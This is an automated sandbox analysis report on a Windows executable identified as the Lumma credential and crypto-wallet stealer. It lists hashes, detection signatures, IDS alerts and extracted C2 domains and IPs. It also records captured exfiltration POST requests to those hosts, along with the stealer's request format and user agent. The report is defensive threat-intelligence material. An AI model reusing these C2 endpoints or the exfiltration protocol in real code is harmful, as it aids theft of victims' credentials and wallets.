
Windows Analysis Report
ardware-v1.exe

Overview

General Information

Sample name: ardware-v1.exe
Analysis ID: 1577233
MD5: c491ddba2ee7516cfc5d5b57ece509a2
SHA1: c0d068660dd74e890bf653a5c839e32314f6bca3
SHA256: 1a0b974102462f42d51ae78898fa59bcb9e399c9c3207d26ce0a503a1262f1e6
Tags: exe, user-smica83

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ardware-v1.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\ardware-v1.exe" MD5: C491DDBA2EE7516CFC5D5B57ECE509A2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["immureprech.biz", "spend-shiny.cyou", "awake-weaves.cyou", "wrathful-jammy.cyou", "diffuculttan.xyz", "debonairnukk.xyz", "deafeninggeh.biz", "effecterectz.xyz", "sordid-snaked.cyou"], "Build id": "tfL8re--"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(5 of 14 entries shown)

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T09:58:37.556615+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 178.62.201.34 | 443 | TCP
2024-12-18T09:58:41.328110+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49713 | 45.77.249.79 | 443 | TCP
2024-12-18T09:58:45.603019+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 23.55.153.106 | 443 | TCP
2024-12-18T09:58:47.956560+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:50.485048+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:53.515162+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49717 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:55.867927+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49718 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:59.279633+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49719 | 104.21.66.86 | 443 | TCP
2024-12-18T09:59:02.733201+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49720 | 104.21.66.86 | 443 | TCP
2024-12-18T09:59:05.287293+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49721 | 104.21.66.86 | 443 | TCP
2024-12-18T09:59:09.101015+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49722 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:38.131521+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 178.62.201.34 | 443 | TCP
2024-12-18T09:58:42.516776+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 45.77.249.79 | 443 | TCP
2024-12-18T09:58:49.061153+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:51.308205+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-18T09:59:09.910836+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49722 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:38.131521+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 178.62.201.34 | 443 | TCP
2024-12-18T09:58:42.516776+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 45.77.249.79 | 443 | TCP
2024-12-18T09:58:49.061153+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:51.308205+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:41.328110+0100 | 2058215 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49713 | 45.77.249.79 | 443 | TCP
2024-12-18T09:58:37.556615+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49712 | 178.62.201.34 | 443 | TCP
2024-12-18T09:58:43.610498+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 58299 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:38.138129+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 54576 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:39.135253+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 54576 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:43.075720+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 58557 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:42.847703+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 52922 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:42.536331+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 65325 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:34.461277+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 52795 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:35.448316+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 52795 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:43.846754+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 59296 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:43.381328+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 56284 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:57.737935+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49718 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:37.558557+0100 | 2822521 | 1 | Domain Observed Used for C2 Detected | 178.62.201.34 | 443 | 192.168.2.8 | 49712 | TCP
2024-12-18T09:58:41.432096+0100 | 2822521 | 1 | Domain Observed Used for C2 Detected | 45.77.249.79 | 443 | 192.168.2.8 | 49713 | TCP
2024-12-18T09:58:46.363652+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49714 | 23.55.153.106 | 443 | TCP

AV Detection

Source: https://sordid-snaked.cyou/api7 | Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/apie | Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/P: | Avira URL Cloud: Label: malware
Source: https://awake-weaves.cyou/api8 | Avira URL Cloud: Label: malware
Source: https://spend-shiny.cyou:443/api | Avira URL Cloud: Label: malware
Source: https://awake-weaves.cyou/apiL | Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz:443/api1 | Avira URL Cloud: Label: malware
Source: spend-shiny.cyou | Avira URL Cloud: Label: malware
Source: 0.2.ardware-v1.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["immureprech.biz", "spend-shiny.cyou", "awake-weaves.cyou", "wrathful-jammy.cyou", "diffuculttan.xyz", "debonairnukk.xyz", "deafeninggeh.biz", "effecterectz.xyz", "sordid-snaked.cyou"], "Build id": "tfL8re--"}
Source: ardware-v1.exe | Virustotal: Detection: 20%
Source: ardware-v1.exe | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 87.2% probability
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: sordid-snaked.cyou
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: awake-weaves.cyou
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: wrathful-jammy.cyou
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: debonairnukk.xyz
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: diffuculttan.xyz
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: effecterectz.xyz
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: deafeninggeh.biz
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: immureprech.biz
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: spend-shiny.cyou
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: lid=%s&j=%s&ver=4.0
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: TeslaBrowser/5.5
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: - Screen Resoluton:
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: - Physical Installed Memory:
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: Workgroup: -
Source: 0.2.ardware-v1.exe.400000.0.unpack | String decryptor: tfL8re--
Source: ardware-v1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ardware-v1.exe | Static PE information: certificate valid
Source: unknown | HTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: ardware-v1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Admin\Workspace\1191982842\Project\Release\Project.pdb | source: ardware-v1.exe
Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: number of queries: 1001

Networking

Source: Network traffic | Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.8:65325 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.8:59296 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.8:49713 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.8:56284 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.8:49713
Source: Network traffic | Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.8:54576 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.8:49712 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.8:58299 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.8:52795 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.8:52922 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.8:49712
Source: Network traffic | Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.8:58557 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49714 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49713 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49713 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49712 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49712 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49718 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49715 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49715 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49716 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49716 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49722 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: immureprech.biz
Source: Malware configuration extractor | URLs: spend-shiny.cyou
Source: Malware configuration extractor | URLs: awake-weaves.cyou
Source: Malware configuration extractor | URLs: wrathful-jammy.cyou
Source: Malware configuration extractor | URLs: diffuculttan.xyz
Source: Malware configuration extractor | URLs: debonairnukk.xyz
Source: Malware configuration extractor | URLs: deafeninggeh.biz
Source: Malware configuration extractor | URLs: effecterectz.xyz
Source: Malware configuration extractor | URLs: sordid-snaked.cyou
Source: DNS query: effecterectz.xyz
Source: DNS query: diffuculttan.xyz
Source: DNS query: debonairnukk.xyz
Source: Joe Sandbox View | IP Address: 45.77.249.79
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | IP Address: 178.62.201.34
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49720 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49719 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49722 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49721 -> 104.21.66.86:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: immureprech.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: deafeninggeh.biz
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 42 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=0SYGSMFUW8EWPM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12817 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=PWR04A959 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15016 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=TRK9XY1MPYD13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20207 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=CY2NMLA0B | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1163 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=T20P8D76V41Z | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 590968 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 77 | Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: $LDstly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https: equals www.youtube.com (Youtube)
Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: //*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr@ equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: spend-shiny.cyou
Source: global traffic | DNS traffic detected: DNS query: immureprech.biz
Source: global traffic | DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic | DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic | DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic | DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic | DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic | DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic | DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: immureprech.biz
Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: ardware-v1.exe | String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: ardware-v1.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: ardware-v1.exe, 00000000.00000003.2517557532.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2331449931.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632755180.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2484156377.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2521220683.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.000000000107B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
